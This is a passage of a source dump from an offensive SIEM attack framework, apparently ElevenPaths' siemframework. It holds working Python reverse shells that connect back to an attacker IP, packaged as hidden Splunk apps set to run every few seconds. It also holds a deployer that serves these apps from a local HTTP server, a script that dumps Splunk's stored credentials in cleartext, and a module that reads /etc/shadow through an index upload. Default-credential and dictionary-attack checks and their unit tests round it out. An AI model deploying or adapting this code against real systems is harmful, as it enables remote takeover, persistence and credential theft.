local IP address: ") 32 | 33 | context = binding.connect( 34 | host=ip, 35 | port=port, 36 | username=splunk_username, 37 | password=splunk_password) 38 | 39 | response = context.get('apps/local') 40 | if response.status != 200: 41 | raise Exception("%d (%s)" % (response.status, response.reason)) 42 | 43 | body = response.body.read() 44 | data = ElementTree.XML(body) 45 | apps = data.findall( 46 | "{http://www.w3.org/2005/Atom}entry/{http://www.w3.org/2005/Atom}title") 47 | 48 | globals.splunk_messages(1) 49 | 50 | for app in apps: 51 | print("[*] " + app.text) 52 | print(SEPARATOR) 53 | 54 | basedir = os.path.dirname(os.path.abspath(__file__)) 55 | if appname == "rshell.tar.gz": # linux python reverse shell 56 | relpath = 'rshell/bin/reverse_shell.py' 57 | 58 | with open( 59 | os.path.join(basedir, 'reverse_shell_original.py')) as f: 60 | # replace the attacker ip 61 | new_text = f.read().replace('REPLACEME', str(local_ip)) 62 | with open(os.path.join(basedir, relpath), "w+") as f: 63 | f.write(new_text) 64 | with tarfile.open(os.path.join(basedir, 'rshell.tar.gz'), "w:gz") as tar: 65 | tar.add(os.path.join(basedir, 'rshell'), arcname='rshell') 66 | 67 | if appname == "wrshell.tar.gz": # windows python reverse shell 68 | relpath = 'wrshell/bin/reverse_shell_win.py' 69 | 70 | with open(os.path.join(basedir, 'reverse_shell_win_original.py')) as f: 71 | new_text = f.read().replace('REPLACEME', str(local_ip)) 72 | with open(os.path.join(basedir, relpath), "w+") as f: 73 | f.write(new_text) 74 | with tarfile.open(os.path.join(basedir, 'wrshell.tar.gz'), "w:gz") as tar: 75 | tar.add(os.path.join(basedir, 'wrshell'), arcname='wrshell') 76 | 77 | os.chdir(basedir) 78 | port = 9337 79 | server = HTTPServer(('', port), SimpleHTTPRequestHandler) 80 | thread = threading.Thread(target=server.serve_forever) 81 | thread.daemon = True 82 | try: 83 | thread.start() 84 | except KeyboardInterrupt: 85 | server.shutdown() 86 | sys.exit(0) 87 | 88 | if appname != "None": 89 | 90 | apptgz = 'http://' + local_ip + ':' + str(port) + '/' + appname 91 | response2 = context.post('apps/local', filename='true', name=apptgz) 92 | if response2.status != 201: # 201 is the success code 93 | raise Exception("%d (%s)" % (response2.status, response2.reason)) 94 | 95 | body2 = response2.body.read() 96 | data2 = ElementTree.XML(body2) 97 | results = data2.findall( 98 | "{http://www.w3.org/2005/Atom}entry/{http://www.w3.org/2005/Atom}title") 99 | 100 | for result in results: 101 | globals.splunk_messages(2, result.text) 102 | server.shutdown() 103 | 104 | if ("rshell.tar.gz" or "wrshell.tar.gz") == appname: # reverse shells 105 | print( 106 | Fore.RED + Style.BRIGHT + 107 | "[!] Please start a listener on the attacker host " 108 | "port 12345, for example: nc -lvp 12345") 109 | if ("bshell.tar.gz" or "wbshell.tar.gz" or "wbshellexe.tar.gz") == appname: 110 | # bind shells 111 | print( 112 | Fore.RED + Style.BRIGHT + 113 | "[!] Please connect to the victim host on port " 114 | "12346, for example: nc -v " + ip + " 12346") 115 | if appname == "wadduser.tar.gz": # windows adduser 116 | print( 117 | Fore.RED + Style.BRIGHT + 118 | "[!] Administrator user added on the victim host " + 119 | ip + ", user: siemadmin with password: siemadmin123$") 120 | print(SEPARATOR) 121 | 122 | else: 123 | globals.splunk_messages(3) 124 | 125 | # %%%%%%%%%% The End %%%%%%%%%%# 126 | -------------------------------------------------------------------------------- /splunk/obtainpwds.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Obtain Splunk Stored Credentials 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | import sys 8 | import getpass 9 | import globals 10 | import splunklib.client as client 11 | 12 | sys.path.append('../') 13 | 14 | # %%%%%%%%%%% Functions %%%%%%%%%%%# 15 | 16 | 17 | def obtain_credentials(ip, port): 18 | 19 | splunk_admin = input("[!] Enter Splunk Admin (Default admin): ") 20 | splunk_password = getpass.getpass("[!] Enter Splunk Password: ") 21 | 22 | splunk_service = client.connect( 23 | host=ip, port=port, 24 | username=splunk_admin, password=splunk_password) 25 | cred_sep = "``splunk_cred_sep``" 26 | 27 | storage_passwords = splunk_service.storage_passwords 28 | globals.splunk_messages(4) 29 | 30 | for credential in storage_passwords: 31 | # new format rest credential 32 | if cred_sep in credential.name and cred_sep not in credential.clear_password: 33 | 34 | username = credential.username.replace(cred_sep, '') 35 | username = username[:(len(username) - 1)] 36 | mess = [ 37 | credential.name.replace(cred_sep, ''), username, 38 | credential.encr_password, credential.clear_password] 39 | globals.splunk_messages(5, mess) 40 | 41 | if cred_sep not in credential.name: # old format credential 42 | mess = [ 43 | credential.name, credential.username, 44 | credential.encr_password, credential.clear_password] 45 | globals.splunk_messages(5, mess) 46 | 47 | # %%%%%%%%%% The End %%%%%%%%%%# 48 | -------------------------------------------------------------------------------- /splunk/obtainsplunkinfo.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Obtain Splunk Version and Information from Web Interface 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | import re 8 | import json 9 | import globals 10 | import urllib3 11 | import logging 12 | import requests 13 | 14 | # %%%%%%%%%%%% Constants %%%%%%%%%%%%%# 15 | 16 | SEPARATOR = "[*] {0} [*]".format('=' * 110) 17 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 18 | 19 | # %%%%%%%%%%% Functions %%%%%%%%%%%# 20 | 21 | 22 | def obtain_splunk_info(ip, port): 23 | 24 | prefix = "http://" 25 | ssl = 0 26 | 27 | if port == "8443": 28 | ssl = 1 29 | prefix = "https://" 30 | 31 | url = prefix + ip + ":" + port 32 | 33 | try: 34 | if ssl: 35 | response = requests.get(url, verify=False) 36 | else: 37 | response = requests.get(url) 38 | 39 | data = response.text 40 | json_data = re.findall(r'"content".*?:(.*?)}].*?"generator"', data) 41 | services_info = json.loads(json_data[0]) 42 | services_session = json.loads(json_data[1]) 43 | config_web = json.loads(json_data[2]) 44 | globals.splunk_messages(6) 45 | 46 | for x in services_info: 47 | print("[*] " + str(x) + ": " + str(services_info[x])) 48 | globals.splunk_messages(7) 49 | 50 | for x in services_session: 51 | print("[*] " + str(x) + ": " + str(services_session[x])) 52 | globals.splunk_messages(8) 53 | 54 | for x in config_web: 55 | print("[*] " + str(x) + ": " + str(config_web[x])) 56 | 57 | except Exception as e: 58 | logging.error(e, exc_info=True) 59 | 60 | # %%%%%%%%%% The End %%%%%%%%%%# 61 | -------------------------------------------------------------------------------- /splunk/obtainsysteminfo.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Obtain Splunk System Information 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | import sys 8 | import getpass 9 | import globals 10 | import splunklib.client as client 11 | 12 | sys.path.append('../') 13 | 14 | # %%%%%%%%%%% Functions %%%%%%%%%%%# 15 | 16 | 17 | def obtain_system_info(ip, port): 18 | 19 | splunk_admin = input("[!] Enter Splunk Admin (Default admin): ") 20 | splunk_password = getpass.getpass("[!] Enter Splunk Password: ") 21 | 22 | splunk_service = client.connect( 23 | host=ip, port=port, 24 | username=splunk_admin, password=splunk_password) 25 | content = splunk_service.info 26 | 27 | globals.splunk_messages(6) 28 | 29 | for key in sorted(content.keys()): 30 | value = content[key] 31 | if isinstance(value, list): 32 | print("[*] %s:" % key) 33 | for item in value: 34 | print("[!] %s" % item) 35 | else: 36 | print("[*] %s: %s" % (key, value)) 37 | 38 | globals.splunk_messages(8) 39 | content = splunk_service.settings.content 40 | 41 | for key in sorted(content.keys()): 42 | value = content[key] 43 | print("[*] %s: %s" % (key, value)) 44 | 45 | # %%%%%%%%%% The End %%%%%%%%%%# 46 | -------------------------------------------------------------------------------- /splunk/readfile.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # In Linux installations read /etc/shadow file 4 | # from the host where Splunk is installed 5 | 6 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 7 | 8 | import sys 9 | import getpass 10 | import globals 11 | import splunklib.client as client 12 | 13 | sys.path.append('../') 14 | 15 | # %%%%%%%%%%%% Constants %%%%%%%%%%%%%# 16 | 17 | SEPARATOR = "[*] {0} [*]".format('=' * 110) 18 | 19 | # %%%%%%%%%%% Functions %%%%%%%%%%%# 20 | 21 | 22 | def read_file(ip, port): 23 | 24 | splunk_admin = input("[!] Enter Splunk Admin (Default admin): ") 25 | splunk_password = getpass.getpass("[!] Enter Splunk Password: ") 26 | splunk_service = client.connect( 27 | host=ip, port=port, 28 | username=splunk_admin, password=splunk_password) 29 | name = "siemsfworkidx" 30 | 31 | if name not in splunk_service.indexes: 32 | siemsfworkidx = splunk_service.indexes.create("siemsfworkidx") 33 | else: 34 | siemsfworkidx = splunk_service.indexes[name] 35 | 36 | # Splunk can be installed on debian, centos, ubuntu and redhat, 37 | # the shadow file is /etc/shadow 38 | 39 | uploadfile = "/etc/shadow" 40 | siemsfworkidx.upload(uploadfile) 41 | 42 | globals.splunk_messages(9) 43 | 44 | # the file is uploaded in the index siemsfworkidx, 45 | # the count=0 is for returning all events 46 | 47 | searchquery_oneshot = "search index = siemsfworkidx | stats list(_raw)" 48 | kwargs_oneshot = {"output_mode": "csv", "count": 0} 49 | oneshotsearch_results = splunk_service.jobs.oneshot( 50 | searchquery_oneshot, **kwargs_oneshot) 51 | results = str(oneshotsearch_results.read()) 52 | data = results.replace('"', '') 53 | data2 = data.replace('list(_raw)', '') 54 | shadow = data2.split(' ') 55 | 56 | for i in shadow: 57 | if not i.startswith('\n'): 58 | print("[*] " + i) 59 | else: 60 | print("[*] " + i.replace('\n', '')) 61 | 62 | print(SEPARATOR) 63 | print( 64 | "[!] Please wait a few seconds for the index to be cleaned and deleted [!]") 65 | 66 | timeout = 60 67 | siemsfworkidx.clean(timeout) 68 | siemsfworkidx.delete() 69 | 70 | # %%%%%%%%%% The End %%%%%%%%%%# 71 | -------------------------------------------------------------------------------- /splunk/reverse_shell_original.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | """ Reverse PTY Shell """ 3 | 4 | import os 5 | import pty 6 | import socket 7 | 8 | attackerip = "REPLACEME" 9 | attackerport = "12345" 10 | 11 | 12 | def main(): 13 | s = socket.socket() 14 | s.connect((attackerip,int(attackerport))) 15 | [os.dup2(s.fileno(), fd) for fd in (0, 1, 2)] 16 | pty.spawn('/bin/bash') 17 | 18 | 19 | if __name__ == "__main__": 20 | main() 21 | -------------------------------------------------------------------------------- /splunk/reverse_shell_win_original.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | """ Splunk Windows/Linux Python Reverse Shell """ 4 | 5 | # Usage: nc -lvp 12345 in the attacker machine 6 | # to set up the listener. Enter quit to end session 7 | 8 | import socket 9 | import subprocess 10 | 11 | HOST = 'REPLACEME' 12 | PORT = 12345 13 | 14 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 15 | s.connect((HOST, PORT)) 16 | s.send('[*] ======================================================= [*]\n'. 17 | encode()) 18 | s.send('[*] Connection Established!\n'.encode()) 19 | s.send('[*] ======================================================= [*]\n'. 20 | encode()) 21 | s.send('$'.encode()) 22 | 23 | while 1: 24 | data = s.recv(1024) 25 | if "quit" in data.decode(): 26 | break 27 | proc = subprocess.Popen( 28 | data.decode(), shell=True, stdout=subprocess.PIPE, 29 | stderr=subprocess.PIPE, stdin=subprocess.PIPE) 30 | stdout_value = proc.stdout.read() + proc.stderr.read() 31 | s.send(stdout_value) 32 | s.send('$'.encode()) 33 | 34 | s.close() 35 | -------------------------------------------------------------------------------- /splunk/rshell/default/app.conf: -------------------------------------------------------------------------------- 1 | # 2 | # Splunk app configuration file 3 | # 4 | 5 | [ui] 6 | is_visible = 0 7 | label = rshell 8 | 9 | [launcher] 10 | author = Yamila Levalle 11 | description = Splunnk Linux Reverse Shell 12 | version = 1.0.1 13 | 14 | -------------------------------------------------------------------------------- /splunk/rshell/default/inputs.conf: -------------------------------------------------------------------------------- 1 | [script://$SPLUNK_HOME/etc/apps/rshell/bin/reverse_shell.py] 2 | 3 | disabled = false 4 | interval = 10 5 | sourcetype = reverse_shell 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /splunk/testovacredentials.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Splunk Test Default VMWare OVA SSH Credentials: 4 | # root/changemenow and splunk/changeme 5 | 6 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 7 | 8 | import nmap 9 | import globals 10 | import logging 11 | import paramiko 12 | 13 | 14 | from globals import SSH_PORT 15 | 16 | # %%%%%%%%%% Functions %%%%%%%%%# 17 | 18 | 19 | def ova_credentials(ip, user, password): 20 | 21 | ssh = paramiko.SSHClient() 22 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 23 | mess = [user, password] 24 | try: 25 | ssh.connect(ip, username=user, password=password) 26 | globals.splunk_messages(10) 27 | globals.messages(9, mess) 28 | 29 | except paramiko.AuthenticationException: 30 | globals.splunk_messages(11, mess) 31 | 32 | 33 | def test_ova_credentials(ip): 34 | 35 | nm = nmap.PortScanner() 36 | 37 | try: 38 | nm.scan(hosts=ip, arguments='-sT -T4 -p 22') 39 | 40 | if nm[ip]['tcp'][SSH_PORT]['state'] == 'open': 41 | ova_credentials(ip, "splunk", "changeme") 42 | ova_credentials(ip, "root", "changemenow") 43 | 44 | except Exception as e: 45 | logging.error(e, exc_info=True) 46 | 47 | # %%%%%%%%%% The End %%%%%%%%%%# 48 | -------------------------------------------------------------------------------- /splunk/wadduser.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ElevenPaths/siemframework/8b317d152f8ae80565a4ee00106c73ee0e1a3381/splunk/wadduser.tar.gz -------------------------------------------------------------------------------- /splunk/wbshell.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ElevenPaths/siemframework/8b317d152f8ae80565a4ee00106c73ee0e1a3381/splunk/wbshell.tar.gz -------------------------------------------------------------------------------- /splunk/wbshellexe.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ElevenPaths/siemframework/8b317d152f8ae80565a4ee00106c73ee0e1a3381/splunk/wbshellexe.tar.gz -------------------------------------------------------------------------------- /splunk/wrshell/default/app.conf: -------------------------------------------------------------------------------- 1 | # 2 | # Splunk app configuration file 3 | # 4 | 5 | [ui] 6 | is_visible = 0 7 | label = wrshell 8 | 9 | [launcher] 10 | author = Yamila Levalle 11 | description = Splunk Windows Reverse Shell 12 | version = 1.0.1 13 | 14 | -------------------------------------------------------------------------------- /splunk/wrshell/default/inputs.conf: -------------------------------------------------------------------------------- 1 | [script://$SPLUNK_HOME/etc/apps/wrshell/bin/reverse_shell_win.py] 2 | 3 | disabled = false 4 | interval = 5 5 | sourcetype = reverse_shell_win 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /test/dict.txt: -------------------------------------------------------------------------------- 1 | changeme 2 | McAfee_4ttack 3 | Splunk 4 | 0ssim_ 5 | Q2adar+ 6 | -------------------------------------------------------------------------------- /test/scan_mcafee_ssh: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 |
11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | cpe:/a:openbsd:openssh:6.6.1p1cpe:/o:linux:linux_kernel 19 | 20 | 21 | 22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /test/test_graylog.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import unittest 5 | import requests_mock 6 | 7 | from io import StringIO 8 | from unittest.mock import patch 9 | from graylog.bruteforcegraylog import graylog_brute 10 | from graylog.testcredentialsgraylog import default_web_credentials 11 | from graylog.testcredentialsgraylog import default_ssh_credentials 12 | from graylog.obtaincredentialsrestapi import obtain_ldap_credentials 13 | 14 | 15 | class TestSiemsframework(unittest.TestCase): 16 | 17 | def setUp(self): 18 | self.ip = '192.168.1.8' 19 | self.port = '9000' 20 | self.url_base = 'http://192.168.1.8:9000' 21 | self.stdout = 'sys.stdout' 22 | 23 | @requests_mock.mock() 24 | def test_graylog_brute(self, response): 25 | url = self.url_base + "/api/system/sessions" 26 | result = "\n\n\x1b[32m\x1b[1m[*] ==================================" \ 27 | "=========================================================" \ 28 | "=================== [*]" \ 29 | "\n\x1b[32m\x1b[1m[!] Dictionary Attack Successful!" \ 30 | "\n\x1b[32m\x1b[1m[*] ====================================" \ 31 | "=========================================================" \ 32 | "================= [*]"\ 33 | "\x1b[0m\n\n\n\x1b[32m\x1b[1m[*] =========================" \ 34 | "=========================================================" \ 35 | "============================ [*]"\ 36 | "\n\x1b[33m\x1b[1m[!] Username: \x1b[31m\x1b[1madmin" \ 37 | "\n\x1b[33m[!] Password: \x1b[31m\x1b[1madmin" \ 38 | "\n\x1b[32m\x1b[1m[*] ====================================" \ 39 | "==========================================================" \ 40 | "================ [*]\x1b[0m\n" 41 | 42 | response.post(url, status_code=200) 43 | with patch(self.stdout, new=StringIO()) as graylog_out: 44 | graylog_brute(self.ip, self.port) 45 | self.assertEqual(graylog_out.getvalue(), result) 46 | 47 | @requests_mock.mock() 48 | def test_web_credentials(self, response): 49 | url = self.url_base + "/api/system/sessions" 50 | result = "\x1b[32m\x1b[22m[*] ======================================" \ 51 | "==========================================================" \ 52 | "============== [*]" \ 53 | "\n\x1b[32m\x1b[22m[!] Graylog Web Interface Default " \ 54 | "Credentials Found!" \ 55 | "\n\x1b[32m\x1b[22m[*] ===================================" \ 56 | "==========================================================" \ 57 | "================= [*]" \ 58 | "\x1b[0m\n\n\n\x1b[32m\x1b[1m[*] ========================" \ 59 | "=========================================================" \ 60 | "============================= [*]" \ 61 | "\n\x1b[33m\x1b[1m[!] Username: \x1b[31m\x1b[1madmin" \ 62 | "\n\x1b[33m[!] Password: \x1b[31m\x1b[1madmin" \ 63 | "\n\x1b[32m\x1b[1m[*] ===================================" \ 64 | "=========================================================" \ 65 | "================== [*]\x1b[0m\n" 66 | 67 | response.post(url, status_code=200) 68 | with patch(self.stdout, new=StringIO()) as graylog_out: 69 | default_web_credentials(self.ip, self.port) 70 | self.assertEqual(graylog_out.getvalue(), result) 71 | 72 | def test_ssh_credentials(self): 73 | result = "\x1b[32m\x1b[22m[*] ====================================" \ 74 | "========================================================" \ 75 | "================== [*]" \ 76 | "\n\x1b[32m\x1b[22m[!] Graylog SSH Default Credentials " \ 77 | "Found!" \ 78 | "\n\x1b[32m\x1b[22m[*] ==================================" \ 79 | "========================================================" \ 80 | "==================== [*]" \ 81 | "\x1b[0m\n\n\n\x1b[32m\x1b[1m[*] =======================" \ 82 | "========================================================" \ 83 | "=============================== [*]" \ 84 | "\n\x1b[33m\x1b[1m[!] Username: \x1b[31m\x1b[1mubuntu" \ 85 | "\n\x1b[33m[!] Password: \x1b[31m\x1b[1mubuntu" \ 86 | "\n\x1b[32m\x1b[1m[*] ===================================" \ 87 | "=========================================================" \ 88 | "================== [*]\x1b[0m\n" 89 | 90 | with patch('sys.stdout', new=StringIO()) as graylog_out,\ 91 | patch('paramiko.SSHClient.connect', autospec=True) as mock_ssh: 92 | mock_ssh.return_value = True 93 | default_ssh_credentials(self.ip) 94 | self.assertEqual(graylog_out.getvalue(), result) 95 | 96 | @requests_mock.mock() 97 | def test_credentials_restapi(self, response): 98 | urlldap = self.url_base + "/api/system/ldap/settings?pretty=true" 99 | urlaws = self.url_base + "/api/system/cluster_config/" \ 100 | "org.graylog.aws.config." \ 101 | "AWSPluginConfiguration?pretty=true" 102 | ldap = '\n "enable" : true,' \ 103 | '\n "system_username" : "uid=pruebaldap, ou=system",' \ 104 | '\n "system_password": "pruebaldap"' 105 | aws = '\n "lookups_enable" : false,' \ 106 | '\n "access_key" : "ALIMAYELELLAV7IDEA",' \ 107 | '\n "secret_key": "ElevenPaths/LABORATORY/Latam"' 108 | 109 | result = "\x1b[32m\x1b[22m[*] ====================================" \ 110 | "========================================================" \ 111 | "================== [*]" \ 112 | "\n\x1b[32m\x1b[22m[!] Graylog LDAP Settings and Credentials" \ 113 | "\n\x1b[32m\x1b[22m[*] ====================================" \ 114 | "==========================================================" \ 115 | "================ [*]" \ 116 | "\x1b[0m\n\n[!] \"enable\" : true," \ 117 | "\n[!] \"system_username\" : \"uid=pruebaldap, ou=system\"," \ 118 | "\n[!] \"system_password\": \"pruebaldap\"" \ 119 | "\n\x1b[32m\x1b[22m[*] ===================================" \ 120 | "=========================================================" \ 121 | "================== [*]" \ 122 | "\n\x1b[32m\x1b[22m[!] Graylog AWS Settings and Credentials" \ 123 | "\n\x1b[32m\x1b[22m[*] ===================================" \ 124 | "=========================================================" \ 125 | "================== [*]" \ 126 | "\x1b[0m\n\n[!] \"lookups_enable\" : false," \ 127 | "\n[!] \"access_key\" : \"ALIMAYELELLAV7IDEA\"," \ 128 | "\n[!] \"secret_key\": \"ElevenPaths/LABORATORY/Latam\"\n" 129 | 130 | response.get(urlldap, status_code=200, text=ldap) 131 | response.get(urlaws, status_code=200, text=aws) 132 | with patch(self.stdout, new=StringIO()) as graylog_out: 133 | with patch('getpass.getpass', return_value='admin'): 134 | obtain_ldap_credentials(self.ip, self.port) 135 | self.assertEqual(graylog_out.getvalue(), result) 136 | 137 | 138 | if __name__ == "__main__": 139 | unittest.main() 140 | 141 | # %%%%%%%%%% The End %%%%%%%%%%# 142 | 143 | 144 | -------------------------------------------------------------------------------- /test/test_mcafee.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import unittest 5 | import requests_mock 6 | 7 | from io import StringIO 8 | from unittest.mock import patch 9 | 10 | from mcafee.bruteforcemcafee import mcafee_brute 11 | from mcafee.bruteforcessh import mcafee_ssh_brute 12 | 13 | 14 | class TestSiemsframework(unittest.TestCase): 15 | 16 | def setUp(self): 17 | self.ip = '192.168.1.8' 18 | self.port = '443' 19 | self.url_base = 'https://192.168.1.8:443' 20 | self.stdout = 'sys.stdout' 21 | self.headers = { 22 | 'Accept': 'application/json,text/plain,*/*', 23 | 'DNT': '1', 24 | 'Host': self.ip, 25 | 'Origin': self.url_base, 26 | 'Referer': self.url_base, 27 | 'Content-Type': 'application/json;charset=utf-8', 28 | 'Connection': 'keep - alive', 29 | 'X-Xsrf-Token': 'null' 30 | } 31 | 32 | @requests_mock.mock() 33 | def test_mcafee_brute(self, response): 34 | url1 = self.url_base + '/ess' 35 | url2 = self.url_base + '/rs/esm/v2/login' 36 | 37 | response.post(url1, status_code=200) 38 | response.post(url2, status_code=201) 39 | 40 | result = "\n\n\x1b[32m\x1b[1m[*] =================================" \ 41 | "========================================================" \ 42 | "===================== [*]" \ 43 | "\n\x1b[32m\x1b[1m[!] Dictionary Attack Successful!" \ 44 | "\n\x1b[32m\x1b[1m[*] ====================================" \ 45 | "=========================================================" \ 46 | "================= [*]"\ 47 | "\x1b[0m\n\n\n\x1b[32m\x1b[1m[*] ========================" \ 48 | "=========================================================" \ 49 | "============================= [*]"\ 50 | "\n\x1b[33m\x1b[1m[!] Username: \x1b[31m\x1b[1mNGCP" \ 51 | "\n\x1b[33m[!] Password: \x1b[31m\x1b[1mhs+&8:fiY91" \ 52 | "\n\x1b[32m\x1b[1m[*] ===================================" \ 53 | "=========================================================" \ 54 | "================== [*]\x1b[0m\n" 55 | 56 | with patch(self.stdout, new=StringIO()) as mcafee_out: 57 | mcafee_brute(self.ip, self.port) 58 | self.assertEqual(mcafee_out.getvalue(), result) 59 | 60 | def test_mcafee_ssh_brute(self): 61 | nm = { 62 | 'nmap': { 63 | 'command_line': 'nmap -oX - -sT -T4 -p 22 192.168.1.8', 64 | 'scaninfo': { 65 | 'tcp': { 66 | 'method': 'connect', 'services': '22'}}, 67 | 'scanstats': { 68 | 'timestr': 'Sat May 16 17:00:54 2020', 69 | 'elapsed': '0.03', 'uphosts': '1', 'downhosts': '0','totalhosts': '1'} 70 | }, 71 | 'scan': { 72 | '192.168.1.8': { 73 | 'hostnames': [{'name': '', 'type': ''}], 74 | 'addresses': { 75 | 'ipv4': '192.168.1.8'}, 76 | 'vendor': {}, 77 | 'status': { 78 | 'state': 'up', 79 | 'reason': 'syn-ack'}, 80 | 'tcp': { 81 | 22: { 82 | 'state': 'open', 83 | 'reason': 'syn-ack', 84 | 'name': 'ssh', 85 | 'product': '', 86 | 'version': '', 87 | 'extrainfo': '', 88 | 'conf': '3', 89 | 'cpe': ''}}}}} 90 | result = "\n\n\x1b[32m\x1b[1m[*] =================================" \ 91 | "========================================================" \ 92 | "===================== [*]" \ 93 | "\n\x1b[31m\x1b[1m[!] Dictionary Attack Not Successful" \ 94 | "\n\x1b[32m\x1b[1m[*] ====================================" \ 95 | "========================================================" \ 96 | "================== [*]\x1b[0m\n" 97 | 98 | with patch('sys.stdout', new=StringIO()) as mcafee_out: 99 | with patch('nmap.PortScanner.scan') as mock_nmap: 100 | with patch('paramiko.SSHClient.connect', autospec=True) as\ 101 | mock_ssh: 102 | mock_nmap.return_value = nm 103 | mock_nmap._scan_result = nm 104 | mock_ssh.return_value = True 105 | mcafee_ssh_brute(self.ip) 106 | self.assertEqual(mcafee_out.getvalue(), result) 107 | 108 | 109 | if __name__ == "__main__": 110 | unittest.main() 111 | 112 | # %%%%%%%%%% The End %%%%%%%%%%# 113 | 114 | 115 | -------------------------------------------------------------------------------- /test/test_ossim.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import unittest 5 | import requests_mock 6 | 7 | from io import StringIO 8 | from unittest.mock import patch 9 | 10 | from ossim.bruteforceossim import ossim_brute 11 | 12 | 13 | class TestSiemsframework(unittest.TestCase): 14 | 15 | def setUp(self): 16 | self.ip = '192.168.1.8' 17 | self.port = '443' 18 | self.url_base = 'https://192.168.1.8:443' 19 | self.stdout = 'sys.stdout' 20 | 21 | @requests_mock.mock() 22 | def test_ossim_brute(self, response): 23 | url = self.url_base + "/ossim/session/login.php" 24 | result = "\n\n\x1b[32m\x1b[1m[*] =================================" \ 25 | "========================================================" \ 26 | "===================== [*]" \ 27 | "\n\x1b[32m\x1b[1m[!] Dictionary Attack Successful!" \ 28 | "\n\x1b[32m\x1b[1m[*] ====================================" \ 29 | "=========================================================" \ 30 | "================= [*]"\ 31 | "\x1b[0m\n\n\n\x1b[32m\x1b[1m[*] ========================" \ 32 | "=========================================================" \ 33 | "============================= [*]"\ 34 | "\n\x1b[33m\x1b[1m[!] Username: \x1b[31m\x1b[1madmin" \ 35 | "\n\x1b[33m[!] Password: \x1b[31m\x1b[1mossim" \ 36 | "\n\x1b[32m\x1b[1m[*] ===================================" \ 37 | "=========================================================" \ 38 | "================== [*]\x1b[0m\n" 39 | 40 | response.post(url, status_code=302) 41 | with patch(self.stdout, new=StringIO()) as ossim_out: 42 | ossim_brute(self.ip, self.port) 43 | self.assertEqual(ossim_out.getvalue(), result) 44 | 45 | 46 | if __name__ == "__main__": 47 | unittest.main() 48 | 49 | # %%%%%%%%%% The End %%%%%%%%%%# 50 | 51 | 52 | -------------------------------------------------------------------------------- /test/test_qradar.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import unittest 5 | import requests_mock 6 | 7 | from io import StringIO 8 | from unittest.mock import patch 9 | 10 | from qradar.bruteforceqradar import qradar_brute 11 | from qradar.apikeybruteqradar import qradar_apikeybrute 12 | 13 | 14 | class TestSiemsframework (unittest.TestCase): 15 | 16 | def setUp(self): 17 | self.inputs = 'siemsframework.input' 18 | self.ip = '192.168.1.8' 19 | self.port = '443' 20 | self.url_base = 'https://192.168.1.8:443' 21 | self.stdout = 'sys.stdout' 22 | 23 | @requests_mock.mock() 24 | def test_qradar_brute(self, session): 25 | url = self.url_base + '/console/' 26 | auth = self.url_base + "/console/j_security_check" 27 | headers = { 28 | 'QRadarCSRF': 'null', 29 | 'Set-Cookie': 'CSRF=8746737hy749; Max' 30 | } 31 | 32 | result = "\n\n\x1b[32m\x1b[1m[*] ==============================" \ 33 | "=======================================================" \ 34 | "========================= [*]" \ 35 | "\n\x1b[32m\x1b[1m[!] Dictionary Attack Successful!" \ 36 | "\n\x1b[32m\x1b[1m[*] ===================================" \ 37 | "========================================================" \ 38 | "=================== [*]" \ 39 | "\x1b[0m\n\n\n\x1b[32m\x1b[1m[*] ==========================" \ 40 | "========================================================" \ 41 | "============================ [*]" \ 42 | "\n\x1b[33m\x1b[1m[!] Username: \x1b[31m\x1b[1madmin" \ 43 | "\n\x1b[33m[!] Password: \x1b[31m\x1b[1mqradar" \ 44 | "\n\x1b[32m\x1b[1m[*] =================================" \ 45 | "========================================================" \ 46 | "===================== [*]\x1b[0m\n" 47 | 48 | session.get(url, headers=headers) 49 | session.post(auth, status_code=322) 50 | 51 | with patch(self.stdout, new=StringIO()) as qrbrute_out: 52 | qradar_brute(self.ip, self.port) 53 | self.assertEqual(qrbrute_out.getvalue(), result) 54 | 55 | @requests_mock.mock() 56 | def test_qradar_apikeybrute(self, response): 57 | url = self.url_base + "/api/system/servers" 58 | 59 | response.get(url, status_code=200) 60 | 61 | result = "\n\n\x1b[32m\x1b[1m[*] ===============================" \ 62 | "=======================================================" \ 63 | "======================== [*]" \ 64 | "\n\x1b[32m\x1b[1m[!] Dictionary Attack Successful!" \ 65 | "\n\x1b[32m\x1b[1m[*] =====================================" \ 66 | "==========================================================" \ 67 | "=============== [*]" \ 68 | "\x1b[0m\n\x1b[32m\x1b[22m[*] =============================" \ 69 | "==========================================================" \ 70 | "======================= [*]" \ 71 | "\n[!] API Key: \x1b[31m\x1b[1m784fba0a-784b-2d3d-a4ba" \ 72 | "-97f4cc1a7d70" \ 73 | 